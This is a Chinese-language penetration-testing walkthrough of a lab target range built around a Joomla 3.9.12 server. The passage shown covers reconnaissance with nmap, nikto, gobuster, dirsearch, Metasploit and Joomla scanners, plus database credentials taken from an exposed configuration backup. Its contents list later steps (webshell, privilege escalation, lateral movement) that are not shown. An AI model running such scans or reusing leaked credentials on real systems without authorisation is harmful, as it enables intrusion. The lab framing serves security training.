目录
前言
外网渗透
外网渗透打点
1、arp
2、nmap
3、nikto
4、whatweb
5、gobuster
6、dirsearch
CMS
1、主页内容
2、/configuration.php~ 目录
3、/administrator 目录
4、Joomla!_version探测
5、joomlascan python脚本
6、joomscan perl脚本
MySQL
1、远程登录
2、查看敏感数据
登录后台
1、成功登录
2、RCE漏洞
蚁剑连接
1、写入shell
2、disable_functions函数绕过
SSH连接
提权
内网渗透
横向渗透1
1、生成木马文件
2、开启监听
3、添加内网路由
横向渗透2
1、建立监听
2、进入meterpreter
3、添加内网路由
4、socks5代理
1、earthworm内网穿透工具
2、配置proxychains4.conf文件
5、内网主机发现
1、第一种模块
2、第二种模块
6、内网攻击
1、密码爆破
2、psexec工具
3、wmiexec.py
7、get flag
前言
在渗透测试中,黑盒测试(Black Box Testing)和白盒测试(White Box Testing)是两种常见的测试方法,它们用于评估目标系统的安全性和弱点。以下是它们的含义和区别:
1. 黑盒测试(Black Box Testing):
黑盒测试是一种从外部视角进行的测试方法,测试人员对被测试系统的内部结构和实现细节一无所知。测试人员将系统视为一个黑盒子,只关注输入与输出,并不考虑内部工作原理。
黑盒测试主要侧重于检查系统的功能、安全漏洞、配置错误等。测试人员扮演外部攻击者的角色,尝试基于系统的可见行为和接口来发现潜在的漏洞。
2. 白盒测试(White Box Testing):
白盒测试是一种从内部视角进行的测试方法,测试人员对被测试系统的内部结构、设计和代码有充分的了解。测试人员可以查看和分析系统的源代码、配置文件和技术文档等内部细节。
白盒测试主要侧重于评估系统的结构、设计、安全实现和代码质量。测试人员可以使用静态代码分析、代码审查等技术来发现潜在的漏洞和安全风险。
黑盒测试和白盒测试各有优势和适用场景。黑盒测试更加注重系统的功能和用户角度,能够模拟真实攻击者的行为。白盒测试更加注重系统的内部安全性和代码质量,能够深入分析实现细节并发现隐藏的漏洞。
在实际渗透测试中,通常会结合使用黑盒测试和白盒测试的方法,以全面评估系统的安全性。这样可以从不同的角度识别并修复潜在的漏洞,提高系统的防御能力。
靶机搭建
1、首先添加一块VMnet2的网卡,子网地址配为:192.168.93.0
2、启动centos靶机,并且使用 “ service network restart ” 命令来获取ip,因为centos有两块网卡,一块桥接网卡,一块VMnet2网卡;前者做外网ip,后者做内网ip。
3、需要改动的靶机只有centos,别的不能动,也千万不能重启。因为部分服务没有自启动功能。如果需要关机,一定要先把各靶机挂起。
4、因为使用的是桥接网卡,所以我们的kali攻击机的网卡也要使用桥接模式。
5、在centos里面使用 ” ifconfig eth0 “ 命令,来看一下有没有获取到ip;在kali里面使用 “ ip a” 命令看看是否获取到IP。
6、最后,我们去浏览器访问一下目标靶机,看看是否可以访问成功。
192.168.93.10 WIN-8GA56TNV3MV
192.168.93.20 WIN2008
192.168.93.30 WIN7
192.168.93.100 192.168.1.21 Centos
192.168.93.120 Ubantu
192.168.1.20 kali
本次打靶练习是一个黑盒测试。所以没有密码,我们的目标是拿到域控制器的权限,并找到其中的重要文件。
外网渗透
外网渗透打点
1、arp
┌──(root㉿ru)-[~/lianxi]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.1.20
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1 00:03:0f:2b:90:20 Digital China (Shanghai) Networks Ltd.
192.168.1.2 d4:8f:a2:9f:51:49 Huawei Device Co., Ltd.
192.168.1.6 3c:55:76:dc:ab:f5 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.1.5 7c:b5:66:a5:f0:a5 Intel Corporate
192.168.1.14 7c:b5:66:a5:f0:a5 (42:f1:e2:49:51:a5) Intel Corporate
192.168.1.13 7c:b5:66:a5:f0:a5 (42:f1:e2:49:51:a5) Intel Corporate
192.168.1.21 00:0c:29:32:46:c9 VMware, Inc.
192.168.1.4 30:03:c8:49:52:4d (42:f1:e2:49:51:a5) CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.1.9 fa:f1:bf:c4:d1:1d (42:f1:e2:49:51:a5) (Unknown: locally administered)
192.168.1.16 30:03:c8:49:52:4d (42:f1:e2:49:51:a5) CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.1.18 30:03:c8:49:52:4d (42:f1:e2:49:51:a5) CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.1.7 c4:75:ab:58:e4:8b (42:f1:e2:49:51:a5) Intel Corporate
192.168.1.8 3c:e9:f7:c0:ef:c7 (42:f1:e2:49:51:a5) Intel Corporate
192.168.1.17 42:45:ab:5e:e9:ce (42:f1:e2:49:51:a5) (Unknown: locally administered)
14 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.346 seconds (109.12 hosts/sec). 14 responded
2、nmap
端口探测
┌──(root㉿ru)-[~/lianxi]
└─# nmap -p- 192.168.1.21 --min-rate 10000 -oA ports
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-01 12:06 CST
Nmap scan report for 192.168.1.21
Host is up (0.0015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
MAC Address: 00:0C:29:32:46:C9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 5.45 seconds
如何提取端口
┌──(root㉿ru)-[~/lianxi]
└─# cat ports.nmap
# Nmap 7.94 scan initiated Fri Dec 1 12:06:52 2023 as: nmap -p- --min-rate 10000 -oA ports 192.168.1.21
Nmap scan report for 192.168.1.21
Host is up (0.0015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
MAC Address: 00:0C:29:32:46:C9 (VMware)
# Nmap done at Fri Dec 1 12:06:58 2023 -- 1 IP address (1 host up) scanned in 5.45 seconds
┌──(root㉿ru)-[~/lianxi]
└─# cat ports.nmap | awk '{print($1)}' | head -n 8 | tail -n 3 | awk -F "/" '{print($1)}' | xargs -n3 | sed 's/ /,/g'
22,80,3306
//涉及到 awk、sed、head、tail、xargs等命令。
信息探测
┌──(root㉿ru)-[~/lianxi]
└─# nmap -sC -sV -sT -O -p 22,80,3306 192.168.1.21 --min-rate 10000 -oA XX
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-01 14:22 CST
Nmap scan report for 192.168.1.21
Host is up (0.00028s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey:
| 1024 25:84:c6:cc:2c:8a:7b:8f:4a:7c:60:f1:a3:c9:b0:22 (DSA)
|_ 2048 58:d1:4c:59:2d:85:ae:07:69:24:0a:dd:72:0f:45:a5 (RSA)
80/tcp open http nginx 1.9.4
|_http-title: 502 Bad Gateway
|_http-server-header: nginx/1.9.4
3306/tcp open tcpwrapped
MAC Address: 00:0C:29:32:46:C9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.63 seconds
udp探测
┌──(root㉿ru)-[~/lianxi]
└─# nmap -sU 192.168.1.21 --min-rate 10000 -oA udp
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-01 14:23 CST
Nmap scan report for 192.168.1.21
Host is up (0.00021s latency).
Not shown: 994 open|filtered udp ports (no-response)
PORT STATE SERVICE
2/udp closed compressnet
9000/udp closed cslistener
16862/udp closed unknown
41971/udp closed unknown
46836/udp closed unknown
49185/udp closed unknown
MAC Address: 00:0C:29:32:46:C9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds
漏洞探测
┌──(root㉿ru)-[~/lianxi]
└─# nmap --script=vuln -p 22,80,3306 192.168.1.21 --min-rate 10000 -oA vuln
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-01 15:20 CST
Nmap scan report for 192.168.1.21
Host is up (0.00021s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-dombased-xss:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.21
| Found the following indications of potential DOM based XSS:
|
| Source: window.open(this.href,'win2','status=no,toolbar=no,scrollbars=yes,titlebar=no,menubar=no,resizable=yes,width=640,height=480,directories=no,location=no')
|_ Pages: http://192.168.1.21:80/, http://192.168.1.21:80/, http://192.168.1.21:80/, http://192.168.1.21:80/, http://192.168.1.21:80/index.php/6-your-template, http://192.168.1.21:80/index.php/5-your-modules, http://192.168.1.21:80/index.php, http://192.168.1.21:80/index.php, http://192.168.1.21:80/index.php, http://192.168.1.21:80/index.php, http://192.168.1.21:80/index.php/4-about-your-home-page
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.21
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.1.21:80/
| Form id: mod-search-searchword87
| Form action: /index.php
|
| Path: http://192.168.1.21:80/index.php/6-your-template
| Form id: mod-search-searchword87
| Form action: /index.php
|
| Path: http://192.168.1.21:80/index.php/login
| Form id: mod-search-searchword87
| Form action: /index.php/login
|
| Path: http://192.168.1.21:80/index.php/login
| Form id: username-lbl
| Form action: /index.php/login?task=user.login
|
| Path: http://192.168.1.21:80/index.php/5-your-modules
| Form id: mod-search-searchword87
| Form action: /index.php
|
| Path: http://192.168.1.21:80/index.php/author-login
| Form id: mod-search-searchword87
| Form action: /index.php/author-login
|
| Path: http://192.168.1.21:80/index.php/author-login
| Form id: username-lbl
| Form action: /index.php/author-login?task=user.login
|
| Path: http://192.168.1.21:80/index.php
| Form id: mod-search-searchword87
| Form action: /index.php
|
| Path: http://192.168.1.21:80/index.php/4-about-your-home-page
| Form id: mod-search-searchword87
|_ Form action: /index.php
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
| /administrator/: Possible admin folder
| /administrator/index.php: Possible admin folder
| /robots.txt: Robots file
| /administrator/manifests/files/joomla.xml: Joomla version 3.9.12
| /language/en-GB/en-GB.xml: Joomla version 3.9.12
| /htaccess.txt: Joomla!
| /README.txt: Interesting, a readme.
| /bin/: Potentially interesting folder
| /cache/: Potentially interesting folder
| /images/: Potentially interesting folder
| /includes/: Potentially interesting folder
| /libraries/: Potentially interesting folder
| /modules/: Potentially interesting folder
| /templates/: Potentially interesting folder
|_ /tmp/: Potentially interesting folder
3306/tcp open mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:32:46:C9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 74.52 seconds
3、nikto
┌──(root㉿ru)-[~/lianxi]
└─# nikto -h 192.168.1.21 nikto.txt
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.1.21
+ Target Hostname: 192.168.1.21
+ Target Port: 80
+ Start Time: 2023-12-01 15:19:50 (GMT8)
---------------------------------------------------------------------------
+ Server: nginx/1.9.4
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /robots.txt: Entry '/libraries/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/modules/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/cache/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/layouts/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/includes/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/administrator/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/cli/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/tmp/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/plugins/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/bin/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/language/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/components/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 14 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /administrator/: This might be interesting.
+ /bin/: This might be interesting.
+ /includes/: This might be interesting.
+ /tmp/: This might be interesting.
+ /LICENSE.txt: License file found may identify site software.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.
+ /administrator/index.php: Admin login page/section found.
+ 8924 requests: 0 error(s) and 24 item(s) reported on remote host
+ End Time: 2023-12-01 15:20:26 (GMT8) (36 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
4、whatweb
┌──(root㉿ru)-[~/lianxi]
└─# whatweb -v http://192.168.1.21
WhatWeb report for http://192.168.1.21
Status : 200 OK
Title : Home
IP : 192.168.1.21
Country : RESERVED, ZZ
Summary : Bootstrap, Cookies[d238a471ae12a7732425ae4995e23fce], HTML5, HTTPServer[nginx/1.9.4], HttpOnly[d238a471ae12a7732425ae4995e23fce], JQuery, MetaGenerator[Joomla! - Open Source Content Management], nginx[1.9.4], OpenSearch[http://192.168.1.21/index.php/component/search/?layout=blog&id=9&Itemid=101&format=opensearch], Script
Detected Plugins:
[ Bootstrap ]
Bootstrap is an open source toolkit for developing with
HTML, CSS, and JS.
Website : https://getbootstrap.com/
[ Cookies ]
Display the names of cookies in the HTTP headers. The
values are not returned to save on space.
String : d238a471ae12a7732425ae4995e23fce
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
String : nginx/1.9.4 (from server string)
[ HttpOnly ]
If the HttpOnly flag is included in the HTTP set-cookie
response header and the browser supports it then the cookie
cannot be accessed through client side script - More Info:
http://en.wikipedia.org/wiki/HTTP_cookie
String : d238a471ae12a7732425ae4995e23fce
[ JQuery ]
A fast, concise, JavaScript that simplifies how to traverse
HTML documents, handle events, perform animations, and add
AJAX.
Website : http://jquery.com/
[ MetaGenerator ]
This plugin identifies meta generator tags and extracts its
value.
String : Joomla! - Open Source Content Management
[ OpenSearch ]
This plugin identifies open search and extracts the URL.
OpenSearch is a collection of simple formats for the
sharing of search results.
String : http://192.168.1.21/index.php/component/search/?layout=blog&id=9&Itemid=101&format=opensearch
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
[ nginx ]
Nginx (Engine-X) is a free, open-source, high-performance
HTTP server and reverse proxy, as well as an IMAP/POP3
proxy server.
Version : 1.9.4
Website : http://nginx.net/
HTTP Headers:
HTTP/1.1 200 OK
Server: nginx/1.9.4
Date: Mon, 07 Oct 2019 08:29:39 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4001
Connection: close
Set-Cookie: d238a471ae12a7732425ae4995e23fce=r8kse6ihf5gjio9jiuegcd1qvj; path=/; HttpOnly
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Last-Modified: Fri, 01 Dec 2023 07:23:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
5、gobuster
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# gobuster dir -u http://192.168.1.21 -w directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.21
[+] Method: GET
[+] Threads: 10
[+] Wordlist: directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 313] [--> http://192.168.1.21/images/]
/media (Status: 301) [Size: 312] [--> http://192.168.1.21/media/]
/templates (Status: 301) [Size: 316] [--> http://192.168.1.21/templates/]
/modules (Status: 301) [Size: 314] [--> http://192.168.1.21/modules/]
/bin (Status: 301) [Size: 310] [--> http://192.168.1.21/bin/]
/plugins (Status: 301) [Size: 314] [--> http://192.168.1.21/plugins/]
/includes (Status: 301) [Size: 315] [--> http://192.168.1.21/includes/]
/language (Status: 301) [Size: 315] [--> http://192.168.1.21/language/]
/components (Status: 301) [Size: 317] [--> http://192.168.1.21/components/]
/cache (Status: 301) [Size: 312] [--> http://192.168.1.21/cache/]
/libraries (Status: 301) [Size: 316] [--> http://192.168.1.21/libraries/]
/tmp (Status: 301) [Size: 310] [--> http://192.168.1.21/tmp/]
/layouts (Status: 301) [Size: 314] [--> http://192.168.1.21/layouts/]
/administrator (Status: 301) [Size: 320] [--> http://192.168.1.21/administrator/]
/cli (Status: 301) [Size: 310] [--> http://192.168.1.21/cli/]
6、dirsearch
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# dirsearch -u http://192.168.1.21 -e*
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 30 | Wordlist size: 15490
Output File: /root/.dirsearch/reports/192.168.1.21/_23-12-01_15-26-31.txt
Error Log: /root/.dirsearch/logs/errors-23-12-01_15-26-31.log
Target: http://192.168.1.21/
[15:26:31] Starting:
[15:26:50] 200 - 18KB - /LICENSE.txt
[15:26:50] 200 - 5KB - /README.txt
[15:26:59] 403 - 277B - /administrator/.htaccess
[15:26:59] 301 - 320B - /administrator -> http://192.168.1.21/administrator/
[15:26:59] 200 - 5KB - /administrator/
[15:26:59] 200 - 2KB - /administrator/includes/
[15:26:59] 200 - 31B - /administrator/cache/
[15:26:59] 200 - 5KB - /administrator/index.php
[15:26:59] 301 - 325B - /administrator/logs -> http://192.168.1.21/administrator/logs/
[15:26:59] 200 - 31B - /administrator/logs/
[15:27:02] 301 - 310B - /bin -> http://192.168.1.21/bin/
[15:27:02] 200 - 31B - /bin/
[15:27:03] 301 - 312B - /cache -> http://192.168.1.21/cache/
[15:27:03] 200 - 31B - /cache/
[15:27:04] 200 - 31B - /cli/
[15:27:04] 301 - 317B - /components -> http://192.168.1.21/components/
[15:27:04] 200 - 31B - /components/
[15:27:05] 200 - 0B - /configuration.php
[15:27:05] 200 - 2KB - /configuration.php~
[15:27:10] 200 - 3KB - /htaccess.txt
[15:27:11] 301 - 313B - /images -> http://192.168.1.21/images/
[15:27:11] 200 - 31B - /images/
[15:27:11] 301 - 315B - /includes -> http://192.168.1.21/includes/
[15:27:11] 200 - 31B - /includes/
[15:27:11] 200 - 16KB - /index.php
[15:27:11] 200 - 9KB - /index.php/login/
[15:27:13] 301 - 315B - /language -> http://192.168.1.21/language/
[15:27:13] 200 - 31B - /layouts/
[15:27:13] 301 - 316B - /libraries -> http://192.168.1.21/libraries/
[15:27:13] 200 - 31B - /libraries/
[15:27:15] 301 - 312B - /media -> http://192.168.1.21/media/
[15:27:15] 200 - 31B - /media/
[15:27:16] 301 - 314B - /modules -> http://192.168.1.21/modules/
[15:27:16] 200 - 31B - /modules/
[15:27:20] 200 - 31B - /plugins/
[15:27:21] 301 - 314B - /plugins -> http://192.168.1.21/plugins/
[15:27:23] 200 - 829B - /robots.txt
[15:27:24] 403 - 277B - /server-status
[15:27:24] 403 - 277B - /server-status/
[15:27:28] 301 - 316B - /templates -> http://192.168.1.21/templates/
[15:27:28] 200 - 31B - /templates/
[15:27:28] 200 - 31B - /templates/index.html
[15:27:28] 200 - 0B - /templates/protostar/
[15:27:28] 200 - 0B - /templates/system/
[15:27:28] 200 - 0B - /templates/beez3/
[15:27:30] 301 - 310B - /tmp -> http://192.168.1.21/tmp/
[15:27:30] 200 - 31B - /tmp/
[15:27:35] 200 - 2KB - /web.config.txt
CMS
1、主页内容
主页是一些博客内容。经过探索,没有发现可以利用点。
根据提示这个网站用的模板是Protostar.
经过探测,可以通过这个id号码进行不同内容的访问。不过最多好像只能访问到6.
2、/configuration.php~ 目录
经过目录探测,我们找到了网站的配置文件。而且我们还找到了数据库的账号以及密码。
账号:testuser
密码:cvcvgjASD!@
3、/administrator 目录
果真是Joomla! ,进行下一步探测。
4、Joomla!_version探测
我们可以使用msf里面的辅助模块进行扫描。
msf6 > search Joomla_version
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/joomla_version normal No Joomla Version Scanner
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/http/joomla_version
msf6 >
msf6 > use 0
msf6 auxiliary(scanner/http/joomla_version) > show options
Module options (auxiliary/scanner/http/joomla_version):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the Joomla application
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/http/joomla_version) > set rhosts 192.168.1.21
rhosts => 192.168.1.21
msf6 auxiliary(scanner/http/joomla_version) > exploit
[*] Server: nginx/1.9.4
[+] Joomla version: 3.9.12
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
经过探测,cms的版本是3.9.12的。那么我们就可以定位到相应的exp了。
┌──(root㉿ru)-[~/lianxi]
└─# searchsploit Joomla 3.9.12
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting | php/webapps/43488.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
┌──(root㉿ru)-[~/lianxi]
└─# searchsploit -m 43488.txt
Exploit: Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting
URL: https://www.exploit-db.com/exploits/43488
Path: /usr/share/exploitdb/exploits/php/webapps/43488.txt
Codes: CVE-2018-5263
Verified: True
File Type: Unicode text, UTF-8 text
Copied to: /root/lianxi/43488.txt
┌──(root㉿ru)-[~/lianxi]
└─# ls
43488.txt ports.gnmap ports.nmap ports.xml port.txt udp.gnmap udp.nmap udp.xml vuln.gnmap vuln.nmap vuln.xml whatweb.txt XX.gnmap XX.nmap XX.xml
┌──(root㉿ru)-[~/lianxi]
└─# cat 43488.txt
# Exploit Title: Joomla Plugin Easydiscuss <4.0.21 Persistent XSS in Edit Message
# Date: 06-01-2018
# Software Link: https://stackideas.com/easydiscuss
# Exploit Author: Mattia Furlani
# CVE: CVE-2018-5263
# Category: webapps
1. Description
Whenever a user edits a message with <\textarea> inside the body, everything after the <\textarea> will be executed in the user’s browser. Works with every version up to 4.0.20
2. Proof of Concept
Login with permissions to post a message, insert <\textarea> in the body and add any html code after that, whenever a user tries to edit that message the code writed after you closed the textarea will be executed
3. Solution:
Update to version 4.0.21
https://stackideas.com/blog/easydiscuss4021-update
找到了对应的exp了,但是这些漏洞都需要管理员的权限才行。所以我们需要进行下一步探测。
5、joomlascan python脚本
┌──(root㉿ru)-[~/tools/JoomlaScan]
└─# python2 joomlascan.py -u http://192.168.1.21 -t 5
-------------------------------------------
Joomla Scan
Usage: python joomlascan.py <target>
Version 0.5beta - Database Entries 1235
created by Andrea Draghetti
-------------------------------------------
Robots file found: > http://192.168.1.21/robots.txt
No Error Log found
Start scan...with 10 concurrent threads!
Component found: com_actionlogs > http://192.168.1.21/index.php?option=com_actionlogs
On the administrator components
LICENSE file found > http://192.168.1.21/administrator/components/com_actionlogs/actionlogs.xml
Explorable Directory > http://192.168.1.21/components/com_actionlogs/
Explorable Directory > http://192.168.1.21/administrator/components/com_actionlogs/
Component found: com_admin > http://192.168.1.21/index.php?option=com_admin
On the administrator components
LICENSE file found > http://192.168.1.21/administrator/components/com_admin/admin.xml
Explorable Directory > http://192.168.1.21/components/com_admin/
Explorable Directory > http://192.168.1.21/administrator/components/com_admin/
Component found: com_ajax > http://192.168.1.21/index.php?option=com_ajax
But possibly it is not active or protected
LICENSE file found > http://192.168.1.21/administrator/components/com_ajax/ajax.xml
Explorable Directory > http://192.168.1.21/components/com_ajax/
Explorable Directory > http://192.168.1.21/administrator/components/com_ajax/
Component found: com_banners > http://192.168.1.21/index.php?option=com_banners
But possibly it is not active or protected
LICENSE file found > http://192.168.1.21/administrator/components/com_banners/banners.xml
Explorable Directory > http://192.168.1.21/components/com_banners/
Explorable Directory > http://192.168.1.21/administrator/components/com_banners/
Component found: com_config > http://192.168.1.21/index.php?option=com_config
Component found: com_contact > http://192.168.1.21/index.php?option=com_contact
LICENSE file found > http://192.168.1.21/administrator/components/com_contact/contact.xml
LICENSE file found > http://192.168.1.21/administrator/components/com_config/config.xml
Component found: com_content > http://192.168.1.21/index.php?option=com_content
Component found: com_contenthistory > http://192.168.1.21/index.php?option=com_contenthistory
But possibly it is not active or protected
Explorable Directory > http://192.168.1.21/components/com_config/
Explorable Directory > http://192.168.1.21/components/com_contact/
Explorable Directory > http://192.168.1.21/administrator/components/com_config/
LICENSE file found > http://192.168.1.21/administrator/components/com_content/content.xml
LICENSE file found > http://192.168.1.21/administrator/components/com_contenthistory/contenthistory.xml
Explorable Directory > http://192.168.1.21/administrator/components/com_contact/
Explorable Directory > http://192.168.1.21/components/com_contenthistory/
Explorable Directory > http://192.168.1.21/components/com_content/
Explorable Directory > http://192.168.1.21/administrator/components/com_contenthistory/
Explorable Directory > http://192.168.1.21/administrator/components/com_content/
Component found: com_fields > http://192.168.1.21/index.php?option=com_fields
But possibly it is not active or protected
LICENSE file found > http://192.168.1.21/administrator/components/com_fields/fields.xml
Explorable Directory > http://192.168.1.21/components/com_fields/
Explorable Directory > http://192.168.1.21/administrator/components/com_fields/
Component found: com_installer > http://192.168.1.21/index.php?option=com_installer
On the administrator components
LICENSE file found > http://192.168.1.21/administrator/components/com_installer/installer.xml
Explorable Directory > http://192.168.1.21/components/com_installer/
Explorable Directory > http://192.168.1.21/administrator/components/com_installer/
Component found: com_joomlaupdate > http://192.168.1.21/index.php?option=com_joomlaupdate
On the administrator components
LICENSE file found > http://192.168.1.21/administrator/components/com_joomlaupdate/joomlaupdate.xml
Explorable Directory > http://192.168.1.21/components/com_joomlaupdate/
Explorable Directory > http://192.168.1.21/administrator/components/com_joomlaupdate/
Component found: com_mailto > http://192.168.1.21/index.php?option=com_mailto
But possibly it is not active or protected
LICENSE file found > http://192.168.1.21/components/com_mailto/mailto.xml
Explorable Directory > http://192.168.1.21/components/com_mailto/
Component found: com_media > http://192.168.1.21/index.php?option=com_media
But possibly it is not active or protected
LICENSE file found > http://192.168.1.21/administrator/components/com_media/media.xml
Explorable Directory > http://192.168.1.21/components/com_media/
Explorable Directory > http://192.168.1.21/administrator/components/com_media/
Component found: com_newsfeeds > http://192.168.1.21/index.php?option=com_newsfeeds
LICENSE file found > http://192.168.1.21/administrator/components/com_newsfeeds/newsfeeds.xml
Explorable Directory > http://192.168.1.21/components/com_newsfeeds/
Explorable Directory > http://192.168.1.21/administrator/components/com_newsfeeds/
Component found: com_search > http://192.168.1.21/index.php?option=com_search
LICENSE file found > http://192.168.1.21/administrator/components/com_search/search.xml
Explorable Directory > http://192.168.1.21/components/com_search/
Explorable Directory > http://192.168.1.21/administrator/components/com_search/
Component found: com_users > http://192.168.1.21/index.php?option=com_users
LICENSE file found > http://192.168.1.21/administrator/components/com_users/users.xml
Explorable Directory > http://192.168.1.21/components/com_users/
Explorable Directory > http://192.168.1.21/administrator/components/com_users/
Component found: com_wrapper > http://192.168.1.21/index.php?option=com_wrapper
LICENSE file found > http://192.168.1.21/components/com_wrapper/wrapper.xml
Explorable Directory > http://192.168.1.21/components/com_wrapper/
End Scanner
6、joomscan perl脚本
perl joomscan.pl -u 192.168.1.21
____ _____ _____ __ __ ___ ___ __ _ _
(_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
(1337.today)
--=[OWASP JoomScan
+---++---==[Version : 0.0.7
+---++---==[Update Date : [2018/09/23]
+---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
--=[Code name : Self Challenge
@OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP
Processing http://192.168.1.21 ...
[+] FireWall Detector
[++] Firewall not detected
